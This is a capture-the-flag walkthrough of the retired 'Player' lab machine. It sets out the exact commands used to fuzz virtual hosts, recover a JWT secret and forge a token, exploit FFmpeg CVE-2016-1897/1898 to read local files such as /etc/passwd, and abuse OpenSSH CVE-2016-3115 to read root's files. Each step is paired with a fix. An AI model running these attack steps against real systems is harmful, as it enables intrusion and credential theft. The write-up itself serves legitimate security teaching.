Player
Summary
I used host-header fuzzing to surface three hidden virtual hosts on the Apache web server, then recovered the HS256 JWT signing secret from a PHP source-code backup file that Apache served without restriction. A forged JWT granted authenticated access to a PlayBuff video-upload application, whose unpatched FFmpeg build was exploited via CVE-2016-1897/1898 to read arbitrary local files by embedding malicious HLS playlists in crafted AVI uploads.
Those reads exposed a service configuration file containing the plaintext SSH password for the account 'telegen'. Connecting to a second SSH service on port 6686 with those credentials succeeded, but the session was confined to a lshell restricted shell.
OpenSSH 7.2 on that port is vulnerable to CVE-2016-3115: the xauth mechanism passed the client-supplied X11 display name to a shell invocation without sanitizing metacharacters, allowing command injection that bypassed the shell restriction entirely. A ported Python proof-of-concept exploited this primitive to read both the user and root flag files directly from disk — full system compromise without a separate privilege-escalation exploit.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export PASSWORD="<a-password-you-choose>"
export PASSWORD4="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 4
nmap -sC -sV -p- --min-rate 5000 $TARGETecho "$TARGET player.htb chat.player.htb dev.player.htb staging.player.htb" | sudo tee -a /etc/hostsffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://player.htb/FUZZ -mc all -fc 404 -t 50ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://$TARGET/ -H 'Host: FUZZ.player.htb' -mc 200,301,302,403 -fc 404 -t 50Exact commands 2
curl -sS http://player.htb/launcher/[REDACTED: sensitive value].phpcurl -sS http://player.htb/launcher/[REDACTED: sensitive value].php~FixBlock Apache from serving editor backup and temporary filesHigh
Exact commands 2
python3 -c "import json,hmac,hashlib,base64; key=b'$PASSWORD'; h=lambda o: base64.urlsafe_b64encode(json.dumps(o,separators=(',',':')).encode()).rstrip(b'=').decode(); hdr=h({'typ':'JWT','alg':'HS256'}); pay=h({'project':'PlayBuff','access_code':'0'}); sig=base64.urlsafe_b64encode(hmac.new(key,f'{hdr}.{pay}'.encode(),hashlib.sha256).digest()).rstrip(b'=').decode(); print(f'{hdr}.{pay}.{sig}')"curl -sS -b 'access=<FORGED_JWT>' http://player.htb/launcher/[REDACTED: sensitive value].phpFixReplace the hardcoded JWT signing secret with an environment-injected cryptographic keyCritical
Exact commands 4
python3 gen_xbin_avi.py /etc/passwdcurl -sS -b 'access=<FORGED_JWT>' -F 'video=@malicious.avi' http://player.htb/launcher/[REDACTED: sensitive value].php -o response.aviffmpeg -i response.avi -vf fps=5 frame%04d.pngconvert -resize 300% -colorspace Gray -sharpen 0x1 frame0001.png enhanced.png && tesseract enhanced.png stdoutFixUpgrade FFmpeg and run media processing in an isolated unprivileged sandboxCritical
Exact commands 3
python3 gen_xbin_avi.py /var/www/backup/service_configcurl -sS -b 'access=<FORGED_JWT>' -F 'video=@malicious.avi' http://player.htb/launcher/[REDACTED: sensitive value].php -o svc_cfg.avi && ffmpeg -i svc_cfg.avi -vf fps=5 svc%04d.png && convert -resize 300% -colorspace Gray -sharpen 0x1 svc0001.png svc_enh.png && tesseract svc_enh.png stdoutpython3 gen_xbin_avi.py /var/www/html/dev/data/users.phpFixRemove credential files from web-accessible and FFmpeg-reachable pathsHigh
Exact commands 2
nmap -sV -p 6686 --script ssh-auth-methods $TARGETssh -p 6686 telegen@$TARGETExact commands 4
searchsploit -p 39569pip install paramikopython3 xauth_read.py $TARGET 6686 telegen '$PASSWORD4' /home/telegen/user.txtpython3 xauth_read.py $TARGET 6686 telegen '$PASSWORD4' /root/root.txtFixPatch OpenSSH on port 6686 to fix CVE-2016-3115 and replace lshell with a genuine isolation boundaryCritical
Attack patterns used
The transferable techniques behind this compromise.
Local File InclusionWebT1190
What it is
A web app builds a file path from user input (?page=../../etc/passwd), letting an unauthorised user read arbitrary files or, via log poisoning, PHP wrappers (php://filter, data://), or session files, achieve code execution. LFI commonly leaks credentials, SSH keys, and source code that feed the next step.
Why it works
The app trusts a path parameter and fails to constrain it to an allow-list. Remediate by mapping identifiers to fixed file paths, disabling dangerous PHP wrappers, and canonicalizing/validating paths.
Read more
Exposed services
| 22/tcp | ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) |
| 80/tcp | http Apache httpd 2.4.18 |
| 6686/tcp | ssh OpenSSH 7.2 (protocol 2.0) |